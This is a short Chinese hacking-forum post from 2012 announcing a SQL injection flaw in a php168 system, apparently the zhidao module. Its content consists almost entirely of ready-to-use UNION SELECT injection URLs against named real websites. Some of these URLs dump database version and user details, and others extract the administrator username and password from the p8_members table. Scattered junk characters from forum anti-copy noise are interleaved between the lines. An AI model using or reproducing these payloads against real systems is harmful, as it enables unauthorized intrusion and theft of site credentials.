找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3041|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
. p. _9 [1 }1 ~( v* N                                                         
' \7 B5 z; ]/ \                                       8 p0 U# Y: V) E5 v* a2 \

- c2 \/ g) _/ Q. T
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
7 b) R8 z3 H+ P8 T                                                     
# J: [/ M5 t4 H9 H8 F                                                                   / t4 e* w* D% y! v& l& S/ u
                                                        3 q4 Z8 J7 v* F6 j! I
http://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
/ E3 V6 B. m: B  S
# H4 C; v# X& _, A* v- }! q
* t; N# `  O- {! W- A- }1 W$ e& E$ m1 L
                                                            - b* E. r* o7 ^6 ?; x$ H) v
' Z4 c7 E- i0 Y/ t. D4 x
http://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--4 `! x, s" V. z5 i7 F8 y. p8 b* m- h
  v  `  t+ L3 D4 {% h& k
: V% k- C! V! @: i- H; i

6 g- t" Y- T/ g& C1 E5 c$ t; e                                                                    * m2 E3 O  n& Y# @: c

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表